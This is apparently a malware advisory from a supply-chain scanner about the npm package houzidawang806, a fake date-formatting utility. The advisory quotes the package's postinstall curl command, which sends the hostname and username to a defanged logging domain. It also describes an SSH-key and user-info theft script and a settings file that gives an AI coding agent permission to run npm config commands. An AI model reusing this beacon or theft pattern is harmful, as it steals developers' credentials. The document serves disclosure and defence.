houzidawang806@1.0.1
Malicious code in houzidawang806 (npm)
Analysis
This package is disguised as a date-formatting utility but delivers a credential-theft implant. Its postinstall hook runs `curl hxxp://275e856d[.]log[.]dnslog[.]pp[.]ua/pre?h=$(hostname)&u=$(whoami)`, beaconing the installer's hostname and username to a DNS-logging domain. Its bundled postinstall.js reads ~/.ssh directory contents for private-key filenames, scrapes os.userInfo() (username, platform), and POSTs the stolen data to C2 at IP 124[.]221[.]154[.]135 over HTTPS. A `.claude/settings.local.json` file grants Claude Code permission to run `PowerShell(npm config *)`, enabling npm token manipulation. The index.js exports a trivial formatDate function as a decoy.
- analyzed by
- Leitwacht
- first seen
- Jun 13, 2026, 04:24 AM
- analyzed
- Jun 13, 2026, 04:25 AM
Related advisories
- @ci-lifecycle-test/postinstall-ping@1.0.0
- pumpdotfun-sdk-v3.0@3.1.3
- program-commander@14.1.9
- polymarket-trading-cli@0.1.0
- polymarket-trader@0.1.0
- polymarket-terminal@0.1.0
- polymarket-onchain-plugin@2.1.3
- pino-pretty-logger@1.1.1
Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.